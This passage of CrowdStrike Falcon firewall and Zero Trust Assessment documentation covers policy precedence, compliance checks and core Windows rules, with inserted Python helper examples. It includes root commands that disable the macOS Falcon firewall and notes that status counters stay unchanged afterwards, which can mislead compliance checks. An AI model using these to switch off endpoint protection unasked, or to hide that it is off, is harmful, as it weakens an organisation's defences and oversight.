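                   if r["kind"] == "traffic" and r["action"] == "Would be blocked"})


if __name__ == "__main__":
    recs = parse_hbfw_log(SAMPLE_LOG)
    for key, n in count_blocks(recs).items():
        print(n, *key)
    print("blocked inbound ports:", blocked_inbound_local_ports(recs))
    print("would be blocked after Monitor Mode:", monitor_mode_candidates(recs))
```

The "unrecognized" bucket matters on Linux, where the note above says several fields are not supported; inspect those rows once and adjust TRAFFIC_FIELDS for that platform rather than silently dropping them.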
Confirm an updated firewall policy or rule for macOS

To confirm a macOS endpoint received an updated firewall policy or rule, run one of the following commands in the terminal:

  1. sudo /Applications/Falcon.app/Contents/Resources/falconctl stats hbfw

    • Check the rule_count value. By default, this value is greater than 0 because it includes the 25 core rules and the default traffic rules at the policy level (inbound and outbound). If the displayed value increases or decreases, a rule was added/enabled or removed/disabled.

  2. sudo /Applications/Falcon.app/Contents/Resources/falconctl stats dynamic_settings | grep hbfw

    • This value is the current firewall channel file version for the sensor. When this value changes, this indicates that the latest policy and rule settings are present on the endpoint.

Default traffic rules

Configure default rules to Allow All or Block All inbound or outbound traffic that is not otherwise specified by the policy’s assigned firewall rules.

CrowdStrike recommends setting your default rule for inbound traffic to Block All.

Firewall Default Policy

Policy precedence allows you to configure your Firewall policies so that when a policy is disabled, host groups adopt the next highest ranking enabled policy they’re assigned to. The default policy is the last policy in the order of precedence. It’s applied to all hosts that aren’t assigned to another enabled policy. As an added safeguard, the Falcon Firewall Management's Default Policy is configured to be unenforceable, which means that no Falcon Firewall policy will be pushed down to hosts assigned to the Default Policy. This guarantees that any hosts that aren't assigned to one of your Firewall policies won't have any traffic unintentionally blocked.

You can also create your own conservative policy for your hosts that aren’t assigned to another enabled firewall policy. To have this firewall policy take effect on your unassigned hosts instead of the updated default, enable the policy, position it in the last place of policy precedence before the Default Policy, and assign all of your host groups to it.

Editing firewall policy precedence

Like other Falcon policies, firewall policies are processed according to precedence on the hosts they’re assigned to, so it’s important to consider this when configuring your organization’s firewall policies.

Policy precedence lets you configure your Firewall policies so that when a policy is disabled, host groups adopt the next highest ranking enabled policy they’re assigned to.

Reorder policy precedence on the Firewall Policies page.

  1. Go to Endpoint security > Firewall > Policies.

  2. Click Edit precedence to activate the arrows.

  3. Drag and drop the arrows to change the precedence order of your policies.

  4. Click Save to keep your changes.

Policy precedence determines which policy's settings are applied to a host when the host is a member of more than one policy. Define policies with different precedences to resolve conflicts. Then, when faced with a conflict, the cloud automatically applies the policy with the higher precedence (1 being higher than 2, which is higher than 3, and so on).

On a host, the policy with the highest ranking precedence (1 being highest) is applied and active. If something changes with that highest-ranking policy, for example if it gets disabled, then the next highest-ranking policy gets applied and becomes active.

Each host can belong to one or more host groups. Host groups can be assigned one or more policies. With dynamic groups, a newly-installed sensor inherits the relevant groups and applies the policy with highest precedence to the host. This provides the host with its initial policy settings.

If a host is not a part of any groups, or the groups it belongs to have no policies assigned, it is automatically assigned to the default policy.
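
The precedence rules in the paragraphs above can be modelled in a few lines. This is an added Python example, not CrowdStrike's code; the policy and host group names are made up, and the model keeps only the attributes the text describes (enabled, enforced, precedence rank, assigned host groups), including the unenforceable Default Policy that unassigned hosts fall back to.

```python
"""Model of Falcon firewall policy precedence resolution (added example, not
CrowdStrike code).  Rules implemented, as described in the documentation:
a host may belong to several host groups; each group may be assigned several
policies; among enabled policies assigned to any of the host's groups, the
one with precedence 1 outranks 2, which outranks 3, and so on; a disabled
policy is skipped; a host matched by no enabled policy gets the Default
Policy, which is not enforced and therefore pushes no firewall rules."""
from dataclasses import dataclass, field


@dataclass
class FirewallPolicy:
    name: str
    precedence: int                 # 1 is the highest-ranking precedence
    enabled: bool = True
    enforce: bool = True            # the policy's "Enforce Policy" setting
    host_groups: set = field(default_factory=set)


# Last in precedence and unenforceable; hosts landing here keep their OS firewall.
DEFAULT_POLICY = FirewallPolicy("Default Policy", precedence=0, enabled=True, enforce=False)


def effective_policy(host_groups, policies):
    """Resolve which firewall policy applies to a host that belongs to `host_groups`."""
    candidates = [p for p in policies
                  if p.enabled and p is not DEFAULT_POLICY and p.host_groups & host_groups]
    if not candidates:
        return DEFAULT_POLICY
    return min(candidates, key=lambda p: p.precedence)


def falcon_firewall_active(policy):
    """Falcon pushes firewall rules only when the resolved policy is enabled and enforced."""
    return policy.enabled and policy.enforce


def unmanaged_hosts(host_memberships, policies):
    """Hostnames whose effective policy leaves them without the Falcon firewall.

    host_memberships maps hostname -> set of host group names.  This is the
    audit list to review before assuming every endpoint is covered.
    """
    return sorted(host for host, groups in host_memberships.items()
                  if not falcon_firewall_active(effective_policy(groups, policies)))


def set_precedence(policies, ordered_names):
    """Apply a drag-and-drop reorder: the first name in ordered_names gets precedence 1."""
    rank = {name: i for i, name in enumerate(ordered_names, start=1)}
    for p in policies:
        if p.name in rank:
            p.precedence = rank[p.name]
    return sorted(policies, key=lambda p: p.precedence)


def build_example_policies():
    """Constructed policy set (hypothetical names, not real policies)."""
    return [
        FirewallPolicy("Servers strict", precedence=1, host_groups={"servers"}),
        FirewallPolicy("Laptops", precedence=2, host_groups={"laptops"}),
        FirewallPolicy("Conservative catch-all", precedence=3,
                       host_groups={"servers", "laptops", "workstations"}),
    ]


if __name__ == "__main__":
    policies = build_example_policies()
    hosts = {"srv01": {"servers"}, "lt01": {"laptops"}, "prn01": {"printers"}}
    for host, groups in hosts.items():
        print(host, "->", effective_policy(groups, policies).name)
    print("without Falcon firewall:", unmanaged_hosts(hosts, policies))
```

The catch-all policy in the sample is the "conservative policy" the Firewall Default Policy section suggests: positioned last before the Default Policy and assigned every host group, it catches hosts whose higher-ranking policy is disabled, while hosts in no assigned group still surface in unmanaged_hosts.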

Assign firewall policies

Assign host groups to a firewall policy. The hosts assigned to a firewall policy are shown on the policy’s Assigned host groups tab and in its expanded row view on the main firewall policies page.

To assign a host group within Firewall Policies:

  1. Go to Endpoint security > Firewall > Policies and click the name of a policy to view its details.

  2. Go to the Assigned host groups tab.

  3. Click Assign groups to policy.

  4. In the Assign groups to policy dialog, select one or more host groups.

  5. Click Assign groups.

Note: Your host group selections are assigned to the policy.

Enable or disable a firewall policy

A firewall policy must be enabled through the policy’s details page, and enforced, for the Falcon firewall rules to take effect on hosts. When an enforced firewall policy is enabled from the Falcon console, Falcon’s firewall rules take precedence over the existing Windows firewall settings for the individual hosts in the assigned host groups. macOS and Falcon firewall settings are enforced concurrently. Similarly, Linux and Falcon firewall settings are enforced concurrently.

When a firewall policy is disabled, hosts adopt the settings and rules from the next firewall policy they are assigned to according to precedence. If a host doesn't belong to any host groups assigned to a firewall policy, it automatically uses the settings defined in the default firewall policy. For more info, see Firewall Default Policy.

When a host group is no longer assigned to any firewall policies that are both enforced and enabled, the Falcon Firewall is removed from its hosts. When a Windows host stops receiving firewall policy from Falcon, it reverts to its Windows firewall settings. Since macOS firewall settings are enforced concurrently with the Falcon firewall, when you remove the Falcon firewall, the macOS and Linux firewall settings remain active.

Note: Admins can modify the Windows firewall on hosts while Falcon is managing the firewall, but the changes don’t take effect unless the host stops receiving firewall policy from Falcon.

To enable or disable a policy:

  1. Go to Endpoint security > Firewall > Policies and click the name of the policy you want to view.

  2. Click the Mac, Windows, or Linux tab to find the policy you want to enable/disable.

  3. Click the name of the policy you want to enable/disable.

  4. Click Enable policy/Disable policy.

CrowdStrike recommends following the same steps given above to manage macOS firewall settings from the Falcon console. However, in the event of an emergency or for troubleshooting you can disable and enable the firewall and event monitoring by running these commands in the terminal:

  • To disable: sudo /Applications/Falcon.app/Contents/Resources/falconctl disable-filter

  • To enable: sudo /Applications/Falcon.app/Contents/Resources/falconctl enable-filter

Delete a firewall policy

Permanently remove a firewall policy by deleting it. You must disable the policy before you can delete it. For more info, see Enable or disable a firewall policy.

  1. Go to Endpoint security > Firewall > Policies and click the name of the policy you want to view.

  2. Click Delete policy.

Note: The Windows, macOS, or Linux firewall settings show the settings that the host would revert to if Falcon firewall policy was removed. Admins can modify the Windows, macOS, or Linux firewall on hosts while Falcon is managing the firewall, but the changes don’t take effect unless the host stops receiving firewall policy from Falcon.

screenshot of Windows Defender Firewall showing the CrowdStrike message that says These settings are being managed by vendor application CrowdStrike Falcon Sensor

View Firewall Events

Go to Endpoint security > Firewall > Activity to see events associated with firewall rule and policy matches. Click any firewall event’s row to expand its details.

When a policy is in Monitor mode, Falcon records events associated with traffic that matches your firewall rules that have Watch mode enabled. It also records traffic that matches the policy’s Default traffic rules and the assigned firewall rules that would be blocked if Monitor mode was turned off. The Action taken for these events is labeled Would be blocked.


Check compliance

Windows

If your organization requires a compliance check performed by applications like VPN software, we provide a registry key called EnforcementLevel located under HKLM\Software\CrowdStrike\FWPolicy. A value of 1 indicates that the firewall is enabled and enforced.

macOS

If your organization requires a compliance check performed by applications like VPN software run sudo /Applications/Falcon.app/Contents/Resources/falconctl stats hbfw. If the values for data, packet, and rule_count are more than 0 (zero), this confirms that the firewall is enabled and enforced.

Linux

If your organization requires a compliance check performed by applications like VPN software, run sudo /opt/CrowdStrike/falconctl -g --hbfw-state. If the output is hbfw-state=enabled, this confirms that the firewall is enabled and enforced.

Note: If the firewall is disabled on the host using the command sudo /Applications/Falcon.app/Contents/Resources/falconctl disable-filter, the falconctl stats command will show the same values for the fields data, packet, and rule_count that it shows if the disable-filter command is not run. Before checking compliance on a host, run the enable-filter command to confirm the firewall is not disabled.

Network Auditing in Windows

While using Falcon Firewall Management, you can enable Windows Filtering Platform’s auditing of firewall-related events on a host to view them in the Windows Security Log for that host.

To enable this reporting, run:

auditpol /set /subcategory:"{0CCE9226-69AE-11D9-BED3-505054503030}" /success:enable /failure:enable

See Windows documentation for more information.

Confirm firewall policies on a macOS endpoint

To confirm that CrowdStrike’s macOS firewall policies are enforced on an endpoint, run the following command in the terminal:

sudo /Applications/Falcon.app/Contents/Resources/falconctl stats hbfw

In the output, locate ===hbfw=== and look for these three values:

  • data

  • packet

  • rule_count

If these values are all 0 (zero), then this means that the firewall is not enabled and not enforced.

Example: Results for a disabled firewall

=== hbfw ===

data: 0

log: 0

packet: 0

rule_count: 0

Example: Results for an enabled firewall

=== hbfw ===

data: 27

log: 0

packet: 2

rule_count: 27

You can also use these value outputs to check for compliance.

Confirm firewall policies on a Linux endpoint

To confirm that CrowdStrike’s Linux firewall policies are enforced on an endpoint, run the following command in the terminal:

sudo /opt/CrowdStrike/falconctl -g --hbfw-state

The output of this command shows the status of the firewall:

  • hbfw-state=enabled: Firewall is enabled and running
  • hbfw-state=disabled: Firewall is disabled
  • hbfw-state=unavailable: Firewall is not supported on the host
  • hbfw-state is not set: On a Kernel Mode Linux sensor, the firewall status is not set
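
As an added example (not CrowdStrike's code), the following Python parses the output of the macOS and Linux commands described in the Check compliance and Confirm firewall policies sections and applies the documented checks. The sample outputs are constructed to match the documented examples; the code does not run falconctl itself, so the caller captures the command output (which requires sudo) and passes it in. The Windows helper only interprets the EnforcementLevel registry value described under Check compliance.

```python
"""Interpret Falcon firewall state from falconctl output on macOS and Linux,
and from the EnforcementLevel registry value on Windows (added example, not
CrowdStrike code).  Sample outputs below are constructed to match the
documented examples."""
import re

MACOS_DISABLED_SAMPLE = """\
=== hbfw ===
data: 0
log: 0
packet: 0
rule_count: 0
"""

MACOS_ENABLED_SAMPLE = """\
=== hbfw ===
data: 27
log: 0
packet: 2
rule_count: 27
"""


def parse_hbfw_stats(text):
    """Return the integer counters under the hbfw header of `falconctl stats hbfw`."""
    stats = {}
    in_section = False
    for line in text.splitlines():
        line = line.strip()
        if re.fullmatch(r"=+\s*hbfw\s*=+", line):   # accepts "===hbfw===" and "=== hbfw ==="
            in_section = True
            continue
        if in_section and line.startswith("="):
            break                                   # a different stats section starts
        if in_section and ":" in line:
            key, _, value = line.partition(":")
            value = value.strip()
            if value.isdigit():
                stats[key.strip()] = int(value)
    return stats


def macos_firewall_enforced(stats):
    """Documented check: data, packet and rule_count must all be greater than 0.

    Caveat from the documentation: these counters do not change after
    `falconctl disable-filter`, so run `enable-filter` first before trusting them.
    """
    return all(stats.get(key, 0) > 0 for key in ("data", "packet", "rule_count"))


# Documented hbfw-state values for `falconctl -g --hbfw-state` on Linux.
LINUX_STATES = {
    "enabled": "Firewall is enabled and running",
    "disabled": "Firewall is disabled",
    "unavailable": "Firewall is not supported on the host",
}


def linux_firewall_state(text):
    """Extract hbfw-state; 'unset' when absent (the documented kernel-mode sensor case)."""
    match = re.search(r"hbfw-state=(\w+)", text)
    return match.group(1) if match else "unset"


def describe_linux_state(text):
    """(state, human-readable meaning) for an hbfw-state output."""
    state = linux_firewall_state(text)
    return state, LINUX_STATES.get(state, "Firewall status is not set")


def linux_firewall_enforced(text):
    return linux_firewall_state(text) == "enabled"


def windows_firewall_enforced(enforcement_level):
    """HKLM\\Software\\CrowdStrike\\FWPolicy\\EnforcementLevel: 1 means enabled and enforced."""
    return enforcement_level == 1


if __name__ == "__main__":
    # On a real host, capture the output first, for example:
    #   sudo /Applications/Falcon.app/Contents/Resources/falconctl stats hbfw > hbfw.txt
    # and pass open("hbfw.txt").read() to parse_hbfw_stats().
    for label, sample in (("disabled", MACOS_DISABLED_SAMPLE), ("enabled", MACOS_ENABLED_SAMPLE)):
        print(label, parse_hbfw_stats(sample), macos_firewall_enforced(parse_hbfw_stats(sample)))
    print(describe_linux_state("hbfw-state=enabled"))
```

A compliance integration should treat "unset" and "unavailable" as distinct from "disabled": the first two mean the sensor cannot report the firewall at all, while "disabled" means a decision was made on the host.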

Support for advanced protocols on macOS hosts

The API on macOS (packet provider) that supports firewall functionality for advanced protocols is disabled by default because, in a small number of instances, it might cause a macOS host to disconnect from the network when combined with VPN and external network interfaces active on that host.

This issue won’t affect most, if any, of your hosts. When advanced protocols are used, CrowdStrike recommends you enable and test the packet provider before deploying. After the packet provider is enabled, the sensor doesn’t need to be reloaded and a new firewall policy isn’t required. Rules in the deployed policy with an advanced protocol are immediately enforced.

To enable the Falcon packet provider, run sudo /Applications/Falcon.app/Contents/Resources/falconctl enable-packet-provider.

CrowdStrike Core Windows Networking Firewall Rules

These rules are automatically enabled on every firewall policy, and are processed before all other rules. There is also an option available to copy these rules when starting a new rule group. These core rules are periodically edited and new ones are periodically added. See the most up-to-date list by clicking the Templates tab on Endpoint Security > Firewall > Rule groups. For more info, see Create a firewall rule group.

| Status | Rule name | Description | Traffic direction | Action to take | Event frequency | Protocol | Local IP | Local port | Remote address | Remote port | Executable filepath | Location |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Enabled | ICMPv6 Neighbor Solicitation | Allow ICMPv6 type 135 In and Out to and from the System process | Both | Allowed | 0 / 0ms | ICMPv6 | * | | * | | System | Any |
| Enabled | Receive ICMP ping reply | Allow ICMPv6 echo reply Inbound to the System process | In | Allowed | 0 / 0ms | ICMPv6 | * | | * | | System | Any |
| Enabled | ICMPv6 Multicast Listener Query | Allow ICMPv6 type 130 In and Out to and from the System process | Both | Allowed | 0 / 0ms | ICMPv6 | * | | * | | System | Any |
| Enabled | Internet Group Management (IGMP) | Allow IGMP (Internet Group Management) In and Out to and from the System process | Both | Allowed | 0 / 0ms | 2 | * | | * | | System | Any |
| Enabled | ICMPv6 Multicast Listener Report | Allow ICMPv6 type 131 In and Out to and from the System process | Both | Allowed | 0 / 0ms | ICMPv6 | * | | * | | System | Any |
| Enabled | DHCP on IPv4 (Service name: Dhcp) | Allow DHCP In and Out to and from the Dhcp service | Both | Allowed | 0 / 0ms | UDP | * | 68 | * | 67 | %SystemRoot%\System32\svchost.exe | Any |
| Enabled | Microsoft DS Group Policy (Service name: Gpsvc) | Allow TCP Out from the Group Policy service when on the Domain | Out | Allowed | 0 / 0ms | TCP | * | | * | | %SystemRoot%\System32\svchost.exe | Domain |
| Enabled | DNS request (Service name: Dnscache) | Allow DNS Out from the Dnscache service | Out | Allowed | 0 / 0ms | UDP | * | | * | 53 | %SystemRoot%\System32\svchost.exe | Any |
| Enabled | Network Time Protocol (Service name: W32Time) | Allow UDP Out from the W32Time service to NTP port | Out | Allowed | 0 / 0ms | UDP | * | | * | 123 | %SystemRoot%\System32\svchost.exe | Any |
| Enabled | Microsoft DS Network Sharing | Allow TCP from the System process to DS network share port when on the Domain | Out | Allowed | 0 / 0ms | TCP | * | | * | 445 | System | Domain |
| Enabled | ICMPv6 Multicast Listener Report version 2 | Allow ICMPv6 type 143 In and Out to and from the System process | Both | Allowed | 0 / 0ms | ICMPv6 | * | | * | | System | Any |
| Enabled | DHCP on IPv6 (Service name: Dhcp) | Allow DHCPv6 In and Out to and from the Dhcp service | Both | Allowed | 0 / 0ms | UDP | * | 546 | * | 547 | %SystemRoot%\System32\svchost.exe | Any |
| Enabled | ICMPv6 Parameter Problem | Allow ICMPv6 type 4 In and Out to and from the System process | Both | Allowed | 0 / 0ms | ICMPv6 | * | | * | | System | Any |
| Enabled | ICMPv6 Neighbor Advertisement | Allow ICMPv6 type 136 In and Out to and from the System process | Both | Allowed | 0 / 0ms | ICMPv6 | * | | * | | System | Any |
| Enabled | ICMPv6 Packet Too Big | Allow ICMPv6 type 2 In and Out to and from the System process | Both | Allowed | 0 / 0ms | ICMPv6 | * | | * | | System | Any |
| Enabled | ICMPv6 Multicast Listener Done | Allow ICMPv6 type 132 In and Out to and from the System process | Both | Allowed | 0 / 0ms | ICMPv6 | * | | * | | System | Any |
| Enabled | Lsass | Allow TCP Out from the lsass process when on the Domain | Out | Allowed | 0 / 0ms | TCP | * | | * | | %SystemRoot%\system32\lsass.exe | Domain |
| Enabled | ICMPv6 Router Solicitation | Allow ICMPv6 type 133 In and Out to and from the System process | Both | Allowed | 0 / 0ms | ICMPv6 | * | | * | | System | Any |
| Enabled | ICMPv6 Router Advertisement out | Allow ICMPv6 type 134 Out from the System process | Out | Allowed | 0 / 0ms | ICMPv6 | fe80:: | | * | | System | Any |
| Enabled | ICMPv6 Router Advertisement in | Allow ICMPv6 type 134 Into the System process | In | Allowed | 0 / 0ms | ICMPv6 | * | | fe80:: | | System | Any |
| Enabled | ICMPv6 Time Exceeded | Allow ICMPv6 type 3 In and Out to and from the System process | Both | Allowed | 0 / 0ms | ICMPv6 | * | | * | | System | Any |
| Enabled | Receive ICMP destination unreachable - fragmentation needed reply | Allow ICMPv4 type 3 code 4 Inbound to the System process | In | Allowed | 0 / 0ms | ICMPv4 | * | | * | | System | Any |

Zero Trust Assessment

Better understand the security posture of your organization’s hosts through a granular assessment of their OS and sensor settings.

Overview

Zero Trust Assessment (ZTA) monitors OS settings and sensor settings of hosts within your organization. This granular assessment of eligible hosts is used to produce a score that uniquely represents the security posture of each host.

Use the Zero Trust Assessment dashboard to view a holistic overview as well as a detailed assessment of monitored hosts, to surface and remediate mismanaged settings, and to increase the security posture of hosts.

Requirements

  • Subscription: Falcon Insight XDR

  • Host System Requirements: The ZTA dashboard monitors and displays information only for hosts on these operating systems:

    • macOS

    • Windows 10 and later

    • Windows Server 2016 and later

    • Windows Server 2019

    • Windows Server 2022

    • Linux

    • Android

    • iOS

  • Roles: All roles that have access to Investigate can access the ZTA dashboard.

  • The following permissions are required to access the ZTA dashboard:

    • Host Management: Read device details

    • LogScaleViews: Read Logscale data

    • LogScale Views: View investigate data in LogScale

    • XDR: General LogScale Read Access

    • Investigate Views: Read Investigate

    • Investigate Views: Read Investigate Data

    • Investigate Views: View Falcon Investigate

    • Investigate Views: Write Investigate

    • Investigate Views: Write Investigate Data

Note: ZTA monitors OS settings for all platforms except Linux. ZTA monitors Falcon sensor settings for all platforms.

Understanding Zero Trust Assessment

Use the Zero Trust Assessment dashboard to:

  • View the security posture of your hosts as represented by a security score.

  • Identify hosts with OS or sensor configurations that might introduce risk.

  • Support auditing measures by reporting on specific settings across managed hosts.

Security score

Zero Trust Assessment calculates a security score from 1 to 100 for each host. A higher score indicates a better security posture for the host. A security score is specific to the unique configurations of your environment. Zero Trust Assessment does not define what constitutes a good score. Instead, the ZTA dashboard provides visibility into possible risks and insight into settings that can increase the security posture of hosts.

Security scores are derived from two distinct assessment sources:

  • OS settings: Settings that track built-in OS security options, firmware availability, and Common Vulnerabilities and Exposures (CVE) mitigations.

    For more info about specific OS settings, see Understanding OS setting requirements.

    Note: OS settings aren’t available for Linux.

  • Falcon sensor settings: Falcon sensor configurations that track reduced functionality mode (RFM) status as well as prevention and Real Time Response policies.

When a change is detected in either the OS or sensor settings, security scores are updated. The Falcon sensor must be restarted for ZTA to detect changes to Windows OS settings. ZTA automatically assesses changes for macOS every 24 hours and a sensor restart isn't required. Restart the sensor to see macOS updates immediately. Android and iOS sensors assess changes every 24 hours or sooner, depending on the signal. The dashboard is automatically updated on an hourly basis.

A host’s security score is also dependent on the ZTA version used to assess the host. This version appears in the ZTA dashboard next to each host’s score. ZTA versions are updated by CrowdStrike to account for changes in how security scores are calculated. For example, if a new prevention policy becomes available in Falcon, ZTA calculations are updated to account for the new policy. Hosts are then assessed based on the new ZTA version and whether they meet the new requirement.

Security score caching

ZTA security scores are cached differently for macOS and Windows systems.

For macOS systems, after ZTA security scores are sent to the sensor from the cloud, the sensor stores the score in a data.zta file. If caching is enabled, the sensor also stores the data in an internal database.

When the sensor shuts down, the sensor removes the data.zta file. When the sensor restarts, the sensor waits for scores from the cloud before creating the data.zta file. If caching is enabled, the sensor copies the scores from the internal database and writes them to the data.zta file. When the cloud sends new scores, the sensor updates the data.zta file and the database.

For Windows systems, after ZTA security scores are sent to the sensor from the cloud and caching is enabled, the sensor writes the score to a data.zta file. When the sensor restarts, the data.zta file is used to provide a score until a new one is provided by the cloud.

If caching is disabled, when the sensor shuts down, the sensor removes the data.zta file. When the sensor restarts, it doesn't have a data.zta file, so no security score is reported until a new file is provided by the cloud.

Note: You can enable or disable ZTA caching by opening a CrowdStrike support ticket or contacting your Technical Account Manager.

Getting to the Zero Trust Assessment dashboard

To access the Zero Trust Assessment dashboard, go to Host setup and management > Manage endpoints > Zero trust assessment.

Working with Zero Trust Assessment information

The Zero Trust Assessment dashboard includes aggregated data about the security posture of all hosts, as well as granular details of each assessed host.

You can work with the data of the entire dashboard with these options:

  • Update data: ZTA data used to populate the dashboard is updated every hour.

  • Export data: Export up to 10,000 records at a time in CSV format.

  • Filter by CID: If you have multiple CIDs, you can use the Customer ID filter to show info for just one CID.

  • Filter by platform: View data for only Mac hosts, Linux hosts, or Windows hosts using the Platform filter.

Viewing aggregate ZTA data

Gather a holistic assessment of the security posture of your hosts with these aggregate measures:

  • Average assessment score over last 7 days

  • Average assessment score today

  • Hosts evaluated over the last 30 days

  • Hosts by assessment score: Hosts are grouped into tiers according to today’s score. You can click a score range to filter the Assessment by agent ID table and show hosts with a security score that falls within the selected range.

  • Failing assessments with highest host counts over the last 30 days: These assessment items were identified as non-compliant for the highest number of hosts. You can click an assessment item to filter the Assessment by Host table to show only hosts that do not meet the requirement for that assessment item.

Viewing ZTA data by host

Identify specific hosts that might require further attention using these tables:

  • Assessment by host: This table includes an OS assessment, a sensor assessment, and an overall assessment for each host, giving you an overview of the security posture.

    • Use the Search by host ID or hostname, Score range, and Assessment fields to filter the list of hosts.

    • Select a host to show more specific info in the Host details table.

  • Host details: This table displays info for the host selected in the Assessment by host table. For each assessment item, this table indicates if the host meets the required setting to be considered compliant.

    • Use the Assessment category filter to show only OS or sensor assessment items.

    • View the priority level of assessment items in the Priority column. If an assessment item doesn't meet the requirement, the priority level is displayed with a color code. Addressing higher priority assessment items as quickly as possible most dramatically increases the security posture of a host and improves its ZTA score. Each assessment item is displayed with one of these priority levels:

      • Immediate (red)

      • High (orange)

      • Moderate (yellow)

      • Low (khaki, or light brown)

    • To manage sensor policies and increase the security posture of the selected host, click Open in Host Management.

    • OS settings can’t be modified in the Falcon console and must be managed on the host itself. For more info about specific OS settings, see Understanding OS setting requirements.

    • The Last updated field indicates when the host was last assessed. ZTA automatically reassesses a host only when a change to one of the assessment items is detected. Changes to Windows OS or macOS settings require a restart of the Falcon sensor to be detected by ZTA.

      Note: This field does not indicate when the dashboard was last updated, only when the host was last assessed. The ZTA dashboard data is updated hourly.

Understanding OS setting requirements

These brief descriptions give an overview of each OS setting monitored by ZTA. For complete details, refer to the applicable platform vendor documentation.

Windows OS security settings
OS security setting Description ZTA requirement

Unified Extensible Firmware Interface (UEFI)

Unified Extensible Firmware Interface (UEFI) is low-level software that starts when a PC is booted, before the operating system boots up. It’s a replacement for traditional BIOS on a PC. Compared to BIOS, it’s a more modern solution supporting larger hard drives, faster boot times, more security features, graphics, and mouse cursors.

A system can be set to run in UEFI enabled or disabled mode and Compatibility Support Module (CSM) state for BIOS-like downgraded performance. This ZTA requirement ensures the host has UEFI compatible firmware irrespective of its enablement status.

Running

Unified Extensible Firmware Interface (UEFI)

Enabling Unified Extensible Firmware Interface (UEFI) provides greater security for a system, particularly in protecting the memory during boot time. Apart from aiding Secure Boot to ensure trusted software loads in a system, UEFI firmware also provides memory protection preventing malicious code from tampering with the firmware and operating system components loaded into memory.

This ZTA requirement ensures the host with UEFI compatible firmware has the boot mode set to UEFI and not in disabled or CSM modes.

Available

Secure Boot

Secure Boot is a security standard developed by members of the PC industry to help make sure a device boots using only software that is trusted by the original equipment manufacturer (OEM). When the PC starts, the firmware checks the signature of each piece of boot software, including UEFI firmware drivers, EFI applications, and the operating system. If the signatures are valid, the PC boots and the firmware gives control to the operating system.

Enabled

Virtual Secure Mode (VSM)

Virtualization-based security uses hardware virtualization features to create and isolate a secure region of memory from the normal operating system. Windows can use VSM to host a number of security solutions, providing them with increased protection from vulnerabilities in the operating system, and preventing the use of malicious exploits that attempt to defeat protections. VSM is required for Credential Guard to be enabled.

Available

Memory Overwrite Request Control

Memory Overwrite Request Control is a setting for Secure Memory Overwrite Request or Secure MOR. Secure MOR enhances Credential Guard to prevent advanced memory attacks. It further protects UEFI variables so when the system is running, even the kernel can’t modify variables that the firmware has identified need more protection. This setting is automatically enabled on Windows hosts.

Enabled

Hardware Security Testability Specifications (HSTI)

The Hardware Security Testability Specification (HSTI) is a Microsoft interface through which platform firmware reports whether the security features it supports are correctly configured. It gives best-effort assurance that a Windows device is secure by default and guards against misconfiguration of those features. HSTI results are consumed by Windows compatibility tests and can be used to verify that devices have been properly configured to enable supported security features. For more info, see the Microsoft article Hardware Security Testability Specification.

Available

System Management Mode (SMM) Protections

System Management Mode (SMM) code executes at the highest privilege level and is invisible to the OS, which makes it an attractive target for malicious activity. Windows automatically enables SMM protections if available. SMM protection uses a hardware-enforced processor feature known as a supervisor SMI handler to monitor the SMM and make sure it doesn’t access any part of the address space that it isn’t supposed to.

Available

Input-output Memory Management Unit (IOMMU)

Input-output Memory Management Unit (IOMMU) offers additional security against direct memory attacks. If available, it is automatically leveraged as part of Windows Memory Access Protection. This ZTA assessment item checks if IOMMU is available on the host.

Available

Input-output Memory Management Unit (IOMMU) In Use

Input-output Memory Management Unit (IOMMU) offers additional security against direct memory attacks. If available, it is automatically leveraged as part of Windows Memory Access Protection. This ZTA assessment item checks if IOMMU is in use. If IOMMU is available but not running then something may have occurred to prevent its use.

In use

Memory Access Protection

Also known as Kernel DMA Protection, Memory Access Protection defends against drive-by direct memory access (DMA) attacks by external PCIe peripherals, such as Thunderbolt devices, by placing them behind the IOMMU and blocking their DMA until a compatible driver is loaded. Older devices may not support it; on hardware and firmware that do, Windows enables it automatically. For more info, see the Microsoft article Kernel DMA Protection (Memory Access Protection) for OEMs.

Enabled

Mode Based Execution Control (MBEC)

Supported in Windows 10 version 1803 and later, Mode Based Execution Control (MBEC) is a processor feature that lets the hypervisor keep separate execute permissions for kernel-mode and user-mode code in its second-level page tables. Hypervisor Code Integrity uses it to verify and enforce the integrity of kernel-mode code more reliably, and with far less overhead than emulating the same separation in software. Windows uses MBEC automatically if it is available.

Available

Secure Kernel

The Secure Kernel is the kernel of the virtualization-based security environment. It runs at a higher trust level (Virtual Trust Level 1) than the normal NT kernel (VTL0). Code and data that Windows places at the higher trust level cannot be directly accessed by the standard NT kernel or by user-mode processes, even if those are compromised. For more info, see the Microsoft article Introducing Kernel Data Protection, a new platform security technology for preventing data corruption.

Running

Credential Guard

Credential Guard uses virtualization-based security to isolate credentials (such as NTLM hashes and Kerberos tickets) from the normal operating system. With Credential Guard enabled, only trusted, privileged processes are allowed to access user credentials, which blocks credential-theft tools that read LSASS memory. This setting requires Secure Boot, UEFI, and VBS. For more info, see the Microsoft article Microsoft Defender Credential Guard hardware requirements.

Note: Virtual Secure Mode (VSM) is required for Credential Guard to be enabled.

Running

Kernel Mode Code Integrity (KMCI)

Kernel Mode Code Integrity (KMCI) is enabled by default. When enabled, it ensures that all kernel-mode drivers are signed; drivers that are not signed cannot load. This assessment item requires Hypervisor Code Integrity to be enabled.

Enabled

Test Signing

Test Signing (the testsigning boot option) lets Windows load kernel-mode drivers signed with test certificates that are not trusted in production, which effectively disables driver signature enforcement. It should always be disabled on production hosts.

Disabled

Debug Mode

When a host is in debug mode (kernel debugging enabled in the boot configuration), an attached debugger can read and modify kernel memory and halt the system, which defeats the kernel integrity protections above. A host in debug mode is not secure, so debug mode should be disabled.

Disabled

Undocumented Windows Beta

Undocumented Windows betas are builds that are not officially part of the Windows Insider Program and are not secure.

Disabled

Windows Insider Program Running

Windows Insider Program (WIP) is an open software testing program by Microsoft. It allows users who own a valid license of Windows to register for pre-release builds of the operating system that were previously accessible only to software developers. A device running a beta version of Windows is less secure. Additionally, the sensor might be in reduced functionality mode (RFM). This ZTA assessment item checks whether the host is running a Windows Insider Program build. The separate Windows Insider Program assessment item checks whether the host is enrolled in the program, not whether it is running such a build.

Not running

Windows Insider Program

